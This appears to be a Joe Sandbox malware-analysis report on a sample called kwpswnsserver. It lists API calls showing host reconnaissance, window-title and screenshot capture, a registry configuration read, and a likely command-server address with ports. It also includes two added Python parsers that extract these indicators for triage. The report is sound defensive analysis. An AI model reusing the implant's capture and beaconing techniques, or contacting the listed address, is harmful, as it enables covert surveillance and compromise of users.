111103 427e1a5 Sleep EnumWindows 111102->111103 111992 4275cc0 2 API calls 111102->111992 111103->111101 111103->111103 111991 4275cc0 IsWindowVisible GetWindowTextW 111103->111991 111104->111101 111105->111101 111202 427f876 111106->111202 111109 427e2bf Sleep RegOpenKeyExW 111110 427e2f5 RegQueryValueExW 111109->111110 111112 427e281 111109->111112 111110->111112 111112->111109 111116 427e339 111112->111116 111211 427ca70 RegOpenKeyExW 111112->111211 111221 4275430 111112->111221 111113 427e345 CloseHandle 111113->111101 111114 427fa29 284 API calls 111114->111116 111115 427e39f Sleep 111115->111116 111116->111113 111116->111114 111116->111115 111117 427e422 WaitForSingleObject CloseHandle 111116->111117 111118 4280542 67 API calls 111116->111118 111120 427e3dd Sleep CloseHandle 111116->111120 111121 427e3cd WaitForSingleObject CloseHandle 111116->111121 111117->111116 111119 427e43c Sleep CloseHandle 111118->111119 111119->111101 111120->111101 111121->111120 111124 428052c 111123->111124 111291 4280e1d 111124->111291 111128 427fa4d 111127->111128 111129 427fa39 111127->111129 111130 4283ca0 ___set_flsgetvalue 3 API calls 111128->111130 111314 427f91b 66 API calls __getptd_noexit 111129->111314 111132 427fa53 111130->111132 111134 4284534 __calloc_crt 66 API calls 111132->111134 111133 427fa3e 111315 42820e2 11 API calls __cftof2_l 111133->111315 111136 427fa5f 111134->111136 111137 427fab0 111136->111137 111309 4283e5b 111136->111309 111139 427f639 _free 66 API calls 111137->111139 111141 427fab6 111139->111141 111143 427e003 CloseHandle 111141->111143 111316 427f941 66 API calls 3 library calls 111141->111316 111142 4283d2e __CRT_INIT@12 66 API calls 111145 427fa75 CreateThread 111142->111145 111148 427f707 111143->111148 111145->111143 111147 427faa8 GetLastError 111145->111147 111332 427f9c4 111145->111332 111147->111137 111150 427f711 111148->111150 111151 427e014 111150->111151 111153 427f72d std::exception::exception 111150->111153 111602 427f673 
Graph data for the code at 0x04270000 (the remainder of the node and edge list that the report renders as an interactive call graph) is omitted here. Its nodes are basic blocks of the unpacked payload annotated with the APIs they reach, among them CreateEventW and InitializeCriticalSectionAndSpinCount, HeapCreate, CreateMutexW with GetLastError, gethostname / gethostbyname / inet_ntoa, select / recv / send, RegOpenKeyExW / RegQueryValueExW / RegEnumValueW / RegCreateKeyW / RegSetValueExW / RegDeleteValueW, VirtualAlloc / VirtualFree, GetLastInputInfo / GetTickCount / GetForegroundWindow / GetWindowTextW, LoadLibraryW / GetProcAddress, IsDebuggerPresent / SetUnhandledExceptionFilter, and the CRT _doexit / ExitThread paths. A second, smaller graph covers a loaded runtime module (nodes 0x6C897xxx to 0x6C8A5xxx: TlsAlloc, critical sections, GlobalAlloc / GlobalLock, Concurrency::cancel_current_task).

                                                                  Control-flow Graph

Control-flow graph of the function at 0x04275430 (basic blocks 0x04275430 to 0x04275A2E). The block and edge list and the executed / not-executed colouring of the rendered graph are omitted here; the API calls the function makes are listed below.
                                                                  APIs
                                                                    • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
                                                                  • _memset.LIBCMT ref: 0427546C
                                                                  • _memset.LIBCMT ref: 04275485
                                                                  • _memset.LIBCMT ref: 04275495
                                                                  • gethostname.WS2_32(?,00000032), ref: 042754A3
                                                                  • gethostbyname.WS2_32(?), ref: 042754AD
                                                                  • inet_ntoa.WS2_32 ref: 042754C5
                                                                  • _strcat_s.LIBCMT ref: 042754D8
                                                                  • _strcat_s.LIBCMT ref: 042754F1
                                                                  • inet_ntoa.WS2_32 ref: 0427551A
                                                                  • _strcat_s.LIBCMT ref: 0427552D
                                                                  • _strcat_s.LIBCMT ref: 04275546
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04275573
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04275587
                                                                  • GetLastInputInfo.USER32(?), ref: 0427559A
                                                                  • GetTickCount.KERNEL32 ref: 042755A0
                                                                  • wsprintfW.USER32 ref: 042755D5
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 042755E8
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 042755FC
                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04275653
                                                                  • wsprintfW.USER32 ref: 0427566C
                                                                  • GetForegroundWindow.USER32 ref: 04275695
                                                                  • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 042756AC
                                                                  • lstrlenW.KERNEL32(000008CC), ref: 042756D3
                                                                  • lstrlenW.KERNEL32(00000994), ref: 04275739
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 042757AA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 042757B1
                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 042757C2
                                                                  • GetSystemInfo.KERNEL32(?), ref: 042757CD
                                                                  • wsprintfW.USER32 ref: 04275806
                                                                  • GetCurrentProcessId.KERNEL32 ref: 04275818
                                                                  • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0427582E
                                                                  • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0427584B
                                                                  • CloseHandle.KERNEL32(04295164), ref: 0427587F
                                                                  • GetTickCount.KERNEL32 ref: 042758E9
                                                                  • __time64.LIBCMT ref: 042758F8
                                                                  • __localtime64.LIBCMT ref: 0427592F
                                                                  • wsprintfW.USER32 ref: 04275968
                                                                  • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0427597D
                                                                  • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0427598C
                                                                  • GetCurrentHwProfileW.ADVAPI32(?), ref: 04275999
                                                                    • Part of subcall function 042780F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 04278132
                                                                    • Part of subcall function 042780F0: lstrcmpiW.KERNEL32(?,A:\), ref: 04278166
                                                                    • Part of subcall function 042780F0: lstrcmpiW.KERNEL32(?,B:\), ref: 04278176
                                                                    • Part of subcall function 042780F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 042781A6
                                                                    • Part of subcall function 042780F0: lstrlenW.KERNEL32(?), ref: 042781B7
                                                                    • Part of subcall function 042780F0: __wcsnicmp.LIBCMT ref: 042781CE
                                                                    • Part of subcall function 042780F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 04278204
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
• Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                  • String ID: %d min$1.0$2024.12. 3$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                  • API String ID: 1101047656-1568689114
                                                                  • Opcode ID: 56b614a2891237fd1ee89a037f3c89b80fae82ef9d7e0cc971576a2034204ce4
                                                                  • Instruction ID: 29a126d3ee753f47f9f5351775dd88f55bb89a221626288e1f654c92fd2ac068
                                                                  • Opcode Fuzzy Hash: 56b614a2891237fd1ee89a037f3c89b80fae82ef9d7e0cc971576a2034204ce4
                                                                  • Instruction Fuzzy Hash: 78F1A5B1B50304BFEB24DB64DC45FDAB7B8EF44704F004998E60AA7181EA74BA85CF65
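A triage note on reading these API lists: Joe Sandbox prints every argument either as an 8-digit hex value or as a string and marks values it could not resolve with `?`, so the useful facts sit in the constants. In the list above, `OpenProcess` asks for desired access 0x400 (PROCESS_QUERY_INFORMATION only) before `K32GetProcessImageFileNameW`; in the main-loop function further down, `RegOpenKeyExW(80000001, Console, 00000000, 00020019, ?)` opens HKEY_CURRENT_USER\Console with KEY_READ and the `RegQueryValueExW` that follows reads the value `IpDatespecial`, the `Sleep` calls use 0x4E20 (20 s), 0xBB8 (3 s), 0xFA0 (4 s) and 0x3E8 (1 s), and `WaitForSingleObject` is given 0xFF (255 ms, not INFINITE). The following Python script, added here as an example and not part of the Joe Sandbox report or its tooling, parses lines in exactly this `• Name.MODULE(args), ref: ADDR` shape (including the `Part of subcall function` prefix) and decodes those constants. The sample lines are copied from this report's two API lists; the decode tables are the Win32 SDK values; the pairing of a registry open with the value query that follows it is a heuristic, because the handle argument is always printed as `?`, and has to be confirmed against the dynamic behaviour.

```python
"""Parse Joe Sandbox "APIs" list lines and decode the constants that matter for triage.
Added example, not Joe Sandbox code. SAMPLE_LINES are copied from the two API lists of
this report (functions 0x04275430 and 0x0427DF10); the decode tables are Win32 SDK values."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SAMPLE_LINES = [
    "• Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721",
    "• gethostname.WS2_32(?,00000032), ref: 042754A3",
    "• GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 042757AA",
    "• OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0427582E",
    "• Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0427E1AA",
    "• Sleep.KERNEL32(00000FA0), ref: 0427E2C4",
    "• RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0427E2EB",
    "• RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0427E30B",
    "• WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0427E3D0",
]

# Line shape: "• Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function X:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_COMBOS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
REG_BITS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
            0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x10000: "DELETE",
            0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
PROCESS_BITS = {0x1: "PROCESS_TERMINATE", 0x2: "PROCESS_CREATE_THREAD", 0x8: "PROCESS_VM_OPERATION",
                0x10: "PROCESS_VM_READ", 0x20: "PROCESS_VM_WRITE", 0x400: "PROCESS_QUERY_INFORMATION",
                0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]               # raw tokens; "?" means the sandbox could not resolve the value
    ref: int                      # call-site address
    parent: Optional[str] = None  # set for "Part of subcall function" lines
    decoded: Dict[str, object] = field(default_factory=dict)


def _hex(tok: str) -> Optional[int]:
    """Integer value of a hex token; None for '?' and for string arguments such as key names."""
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", tok) else None


def _flags(value: int, table: Dict[int, str]) -> str:
    names = [n for bit, n in table.items() if value & bit]
    unknown = value & ~sum(table)  # bits the table has no name for
    if unknown:
        names.append(hex(unknown))
    return "|".join(names) or "0"


def decode_args(call: ApiCall) -> Dict[str, object]:
    a, out = call.args, {}
    if call.name.startswith("Reg") and a and _hex(a[0]) in HKEY_ROOTS:
        out["root"] = HKEY_ROOTS[_hex(a[0])]
        if len(a) > 1:
            out["subkey"] = a[1]
    if call.name == "RegOpenKeyExW" and len(a) > 3 and _hex(a[3]) is not None:
        out["access"] = REG_COMBOS.get(_hex(a[3])) or _flags(_hex(a[3]), REG_BITS)
    if call.name in ("RegQueryValueExW", "RegSetValueExW", "RegDeleteValueW") and len(a) > 1:
        out["value_name"] = a[1]
    if call.name == "Sleep" and a and _hex(a[0]) is not None:
        out["sleep_ms"] = _hex(a[0])
    if call.name == "OpenProcess" and a and _hex(a[0]) is not None:
        out["access"] = _flags(_hex(a[0]), PROCESS_BITS)
    if call.name == "WaitForSingleObject" and len(a) > 1 and _hex(a[1]) is not None:
        out["timeout"] = "INFINITE" if _hex(a[1]) == 0xFFFFFFFF else f"{_hex(a[1])} ms"
    return out


def parse_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None  # headers such as "Strings" or "Memory Dump Source"
    args = [t.strip() for t in m.group("args").split(",")] if m.group("args") is not None else []
    call = ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), m.group("parent"))
    call.decoded = decode_args(call)
    return call


def parse_report(lines) -> List[ApiCall]:
    return [c for c in map(parse_line, lines) if c is not None]


def registry_artifacts(calls: List[ApiCall]) -> List[str]:
    """Heuristic: the handle is printed as '?', so list order is the only link between an open and a query."""
    paths, current = [], None
    for c in calls:
        if c.name in ("RegOpenKeyExW", "RegCreateKeyW") and "root" in c.decoded:
            current = str(c.decoded["root"]) + "\\" + str(c.decoded.get("subkey", ""))
        elif "value_name" in c.decoded and current:
            paths.append(current + "\\" + str(c.decoded["value_name"]))
    return paths


def total_sleep_ms(calls: List[ApiCall]) -> int:
    return sum(c.decoded["sleep_ms"] for c in calls if "sleep_ms" in c.decoded)


if __name__ == "__main__":
    for c in parse_report(SAMPLE_LINES):
        print(f"{c.ref:08X} {c.module}!{c.name} {c.decoded}")
    print(registry_artifacts(parse_report(SAMPLE_LINES)), total_sleep_ms(parse_report(SAMPLE_LINES)), "ms")
```

Run as a script it prints one decoded call per line. On the sample lines `registry_artifacts()` yields HKEY_CURRENT_USER\Console\IpDatespecial, the value to check when hunting for this configuration artifact on a host, and `total_sleep_ms()` sums the fixed delays, which is what decides how long a sandbox run must last before the loop reaches its later calls.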

                                                                  Control-flow Graph

Control-flow graph of the function at 0x0427DF10 (basic blocks 0x0427DF10 to 0x0427E46C). The block and edge list and the executed / not-executed colouring of the rendered graph are omitted here; the API calls the function makes are listed below.
                                                                  APIs
                                                                    • Part of subcall function 04280542: __fassign.LIBCMT ref: 04280538
                                                                  • Sleep.KERNEL32(00000000), ref: 0427DF64
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0427DF91
                                                                  • GetLocalTime.KERNEL32(?), ref: 0427DFA9
                                                                  • wsprintfW.USER32 ref: 0427DFE0
                                                                  • SetUnhandledExceptionFilter.KERNEL32(042775B0), ref: 0427DFEE
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0427E007
                                                                    • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
                                                                  • EnumWindows.USER32(04275CC0,?), ref: 0427E19D
                                                                  • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0427E1AA
                                                                  • EnumWindows.USER32(04275CC0,?), ref: 0427E1BE
                                                                  • Sleep.KERNEL32(00000BB8), ref: 0427E1F5
                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0427E241
                                                                  • Sleep.KERNEL32(00000FA0), ref: 0427E2C4
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0427E2EB
                                                                  • RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0427E30B
                                                                  • CloseHandle.KERNEL32(?), ref: 0427E35D
                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 0427E3A4
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0427E3D0
                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0427E3D7
                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 0427E3E2
                                                                  • CloseHandle.KERNEL32(?), ref: 0427E400
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0427E425
                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0427E42C
                                                                  • Sleep.KERNEL32(00000000,?,?,?), ref: 0427E446
                                                                  • CloseHandle.KERNEL32(?), ref: 0427E464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                  • String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19091$19092$19093$Console$IpDatespecial
                                                                  • API String ID: 1511462596-472669843
                                                                  • Opcode ID: f70767650d9e6f638a1fd90599ea9aa8509a13e4c72ad7e3aace83995436a4fd
                                                                  • Instruction ID: fe8cf0488b959abdd0b41d412329f466320d163dbe35cbfeb6bf604a2bad58cb
                                                                  • Opcode Fuzzy Hash: f70767650d9e6f638a1fd90599ea9aa8509a13e4c72ad7e3aace83995436a4fd
                                                                  • Instruction Fuzzy Hash: 1DD1C3B0B58301EFD320DF68E889A2A77E4FBC4B14F014A1CF55596280DF75AC54CB66
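The listing above is where this function's behaviour is readable without the disassembly: the Sleep operands are hex milliseconds (00004E20 = 20000 ms, 00000BB8 = 3000 ms, 00000FA0 = 4000 ms, 000003E8 = 1000 ms), RegOpenKeyExW(80000001 = HKEY_CURRENT_USER, "Console") followed by RegQueryValueExW("IpDatespecial") is a configuration read from an unusual key, and the String ID line carries the remote address 118.107.44.219 and the ports 19091, 19092 and 19093. The following parser, an added example and not Joe Sandbox code, pulls those facts out of report lines in exactly this rendering so they can be bulk-extracted across many functions; the API-line regex, the 8-hex-digit operand rule and the "bare decimal token = candidate port" rule are assumptions tailored to this page's format, and the sample lines are a constructed subset copied from the listing.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: a subset of the API lines and the "String ID" line
# from the listing of the function at 0427DF64 above.
SAMPLE_LISTING = """\
• Sleep.KERNEL32(00000000), ref: 0427DF64
• SetUnhandledExceptionFilter.KERNEL32(042775B0), ref: 0427DFEE
  • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
• EnumWindows.USER32(04275CC0,?), ref: 0427E19D
• Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0427E1AA
• Sleep.KERNEL32(00000BB8), ref: 0427E1F5
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0427E241
• Sleep.KERNEL32(00000FA0), ref: 0427E2C4
• RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0427E2EB
• RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 0427E30B
• Sleep.KERNEL32(000003E8,?,?), ref: 0427E3A4
• WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 0427E3D0
• String ID: %4d.%2d.%2d-%2d:%2d:%2d$118.107.44.219$118.107.44.219$118.107.44.219$118.107.44.219$19091$19091$19092$19093$Console$IpDatespecial
"""

# Assumed line shape: "[• ][Part of subcall function X: ]Api.Module[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w:]+)\.(?P<module>[\w.]+?)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
STRING_RE = re.compile(r"^\s*(?:•\s*)?String ID:\s*(?P<ids>.*)$")
IPV4_RE = re.compile(r"(?:\d{1,3}\.){3}\d{1,3}")
# Predefined registry hive handles (documented Windows constants).
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
         0x80000005: "HKEY_CURRENT_CONFIG"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list              # int for 8-hex-digit operands, str otherwise ("?" = not recovered)
    ref: int                # address of the call site
    subcall: Optional[int]  # set for "Part of subcall function X:" lines


def _operand(tok: str):
    """Joe Sandbox prints numeric operands as 8 hex digits; anything else is a string/unknown."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok) else tok


def parse_listing(text: str) -> Tuple[List[ApiCall], List[str]]:
    """Split an API listing into call records and the tokens of its String ID line."""
    calls, ids = [], []
    for line in text.splitlines():
        m = STRING_RE.match(line)
        if m:
            ids.extend(t for t in m.group("ids").split("$") if t)
            continue
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [_operand(t) for t in raw.split(",")] if raw is not None else []
            sub = int(m.group("sub"), 16) if m.group("sub") else None
            calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                 int(m.group("ref"), 16), sub))
    return calls, ids


def sleep_ms(calls: List[ApiCall]) -> List[int]:
    """Sleep() operands of this function (not of subcalls), in call order, in milliseconds."""
    return [c.args[0] for c in calls
            if c.api == "Sleep" and c.subcall is None and c.args and isinstance(c.args[0], int)]


def registry_reads(calls: List[ApiCall]) -> List[str]:
    """Pair each RegOpenKeyEx(hive, subkey, ...) with the RegQueryValueEx that follows it."""
    out, pending = [], None
    for c in calls:
        if c.api.startswith("RegOpenKeyEx") and len(c.args) >= 2:
            hive = HIVES.get(c.args[0], str(c.args[0]))
            pending = f"{hive}\\{c.args[1]}"
        elif c.api.startswith("RegQueryValueEx") and pending and len(c.args) >= 2:
            out.append(f"{pending}\\{c.args[1]}")
            pending = None
    return out


def extract_iocs(ids: List[str]) -> dict:
    """Sort String ID tokens into IPv4 addresses, candidate ports, format strings and the rest."""
    ipv4, ports, fmts, other = set(), set(), set(), set()
    for tok in ids:
        if IPV4_RE.fullmatch(tok) and all(int(o) < 256 for o in tok.split(".")):
            ipv4.add(tok)
        elif tok.isdigit() and 1 <= int(tok) <= 65535:   # heuristic: bare decimal = port
            ports.add(int(tok))
        elif "%" in tok:
            fmts.add(tok)
        else:
            other.add(tok)
    return {"ipv4": sorted(ipv4), "candidate_ports": sorted(ports),
            "format_strings": sorted(fmts), "other": sorted(other)}
```

Run `parse_listing(SAMPLE_LISTING)` and feed the result to `sleep_ms`, `registry_reads` and `extract_iocs`: the delays sum to 28 s before the registry read, which is the kind of stall that also shortens what a time-limited sandbox run observes, and the IOC set is the address, the three ports and the `HKEY_CURRENT_USER\Console\IpDatespecial` value. The same parser runs unchanged over the other listings on this page (the drive, disk, process and crypto functions), since they share the line format.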

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 0427BC8F
                                                                  • GetDC.USER32(00000000), ref: 0427BC9C
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0427BCA2
                                                                  • GetDC.USER32(00000000), ref: 0427BCAD
                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 0427BCBA
                                                                  • GetDeviceCaps.GDI32(00000000,00000076), ref: 0427BCC2
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0427BCD3
                                                                  • GetSystemMetrics.USER32(0000004E), ref: 0427BCF8
                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0427BD26
                                                                  • GetSystemMetrics.USER32(0000004C), ref: 0427BD78
                                                                  • GetSystemMetrics.USER32(0000004D), ref: 0427BD8D
                                                                  • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0427BDA6
                                                                  • SelectObject.GDI32(?,00000000), ref: 0427BDB4
                                                                  • SetStretchBltMode.GDI32(?,00000003), ref: 0427BDC0
                                                                  • GetSystemMetrics.USER32(0000004F), ref: 0427BDCD
                                                                  • GetSystemMetrics.USER32(0000004E), ref: 0427BDE0
                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 0427BE07
                                                                  • _memset.LIBCMT ref: 0427BE7A
                                                                  • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 0427BE97
                                                                  • _memset.LIBCMT ref: 0427BEAF
                                                                    • Part of subcall function 0427F707: _malloc.LIBCMT ref: 0427F721
                                                                  • DeleteObject.GDI32(?), ref: 0427BF23
                                                                  • DeleteObject.GDI32(?), ref: 0427BF2D
                                                                  • ReleaseDC.USER32(00000000,?), ref: 0427BF39
                                                                  • DeleteObject.GDI32(?), ref: 0427BFDF
                                                                  • DeleteObject.GDI32(?), ref: 0427BFE9
                                                                  • ReleaseDC.USER32(00000000,?), ref: 0427BFF5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3560589388.0000000004270000.00000040.00001000.00020000.00000000.sdmp, Offset: 04270000, based on PE: true
                                                                  • Associated: 00000003.00000002.3560589388.00000000042A4000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_4270000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                  • String ID: ($6$gfff$gfff
                                                                  • API String ID: 3293817703-713438465
                                                                  • Opcode ID: 63b32f36ad404ef928f77a8d0c29881e26ea75af22bc6a5b41b6d3700c3fb85d
                                                                  • Instruction ID: f37e0d115d7ac99f5b6063ef51bc87461d4a34e23dd6a25b69abad2a5e944549
                                                                  • Opcode Fuzzy Hash: 63b32f36ad404ef928f77a8d0c29881e26ea75af22bc6a5b41b6d3700c3fb85d
                                                                  • Instruction Fuzzy Hash: FFD17BB1E11318AFDB14DFA9E885A9EBBB9FF48304F104529F505AB240DB74AD05CBA1

                                                                  Control-flow Graph

                                                                  [Control-flow graph of the function at 4a9a30 (WinMain of the host module), basic blocks 4a9a30 through 4aa4a7, rendered with executed/not-executed block colouring. API nodes in the graph: SetCurrentDirectoryW at 4a9ab7, GetCommandLineW and CommandLineToArgvW at 4a9bfa, MddBootstrapInitialize2 at 4a9d01, MddBootstrapShutdown at 4aa432; the remaining nodes are internal calls (4a4d40, 4a3540, 4a2680, 4a5a30, 4b13bb, 4b5663, 4b5859, 4ae5b0, 4addf0, 4ac6d0, 4af4b0, 4a1210, 4aa4b0, 4b138a).]
                                                                  APIs
                                                                    • Part of subcall function 004A4D40: RegOpenKeyExW.KERNEL32(80000001,Software\kingsoft\Office\6.0\Common,00000000,00020019,?,?,?,00000000), ref: 004A4D9A
                                                                    • Part of subcall function 004A4D40: RegQueryValueExW.ADVAPI32(?,InstallRoot,00000000,00000000,?,00000200,?,?,00000000), ref: 004A4DC1
                                                                    • Part of subcall function 004A4D40: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004A4DD1
                                                                    • Part of subcall function 004A4D40: RegOpenKeyExW.KERNEL32(80000002,Software\kingsoft\Office\6.0\Common,00000000,00020019,?,?,?,00000000), ref: 004A4DEF
                                                                    • Part of subcall function 004A4D40: RegQueryValueExW.ADVAPI32(?,InstallRoot,00000000,00000000,?,00000200,?,?,00000000), ref: 004A4E16
                                                                    • Part of subcall function 004A4D40: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004A4E40
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000008,00000000), ref: 004A9AC6
                                                                  • GetCommandLineW.KERNEL32(WinMain,00000007), ref: 004A9BFA
                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 004A9C06
                                                                  • MddBootstrapInitialize2.MICROSOFT.WINDOWSAPPRUNTIME.BOOTSTRAP(00010005,004DCC70,?,?,00000000), ref: 004A9D1E
                                                                  • MddBootstrapShutdown.MICROSOFT.WINDOWSAPPRUNTIME.BOOTSTRAP(?,?,?,?,?,?,?,?,?,?,WinMain,00000007), ref: 004AA432
                                                                    • Part of subcall function 004A5A30: RegOpenKeyExW.KERNEL32(80000001,Software\kingsoft\Office\6.0\plugins\messagepushcenter\wns,00000000,00020019,?,EED03960,?,?), ref: 004A5A94
                                                                    • Part of subcall function 004A5A30: RegQueryValueExW.ADVAPI32(?,log,00000000,?,?,?), ref: 004A5ABF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3558864422.00000000004A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 004A0000, based on PE: true
                                                                  • Associated: 00000003.00000002.3558823117.00000000004A0000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000003.00000002.3558976514.00000000004D1000.00000002.00000001.01000000.00000005.sdmp
                                                                  • Associated: 00000003.00000002.3559020450.00000000004E3000.00000004.00000001.01000000.00000005.sdmp
